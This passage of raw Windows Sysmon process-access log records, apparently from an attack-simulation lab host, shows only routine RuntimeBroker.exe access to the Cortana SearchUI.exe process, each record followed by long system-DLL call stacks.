:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245752C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245752C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245356C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245644C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245692C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245356C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245644C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245692C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245640C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245640C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
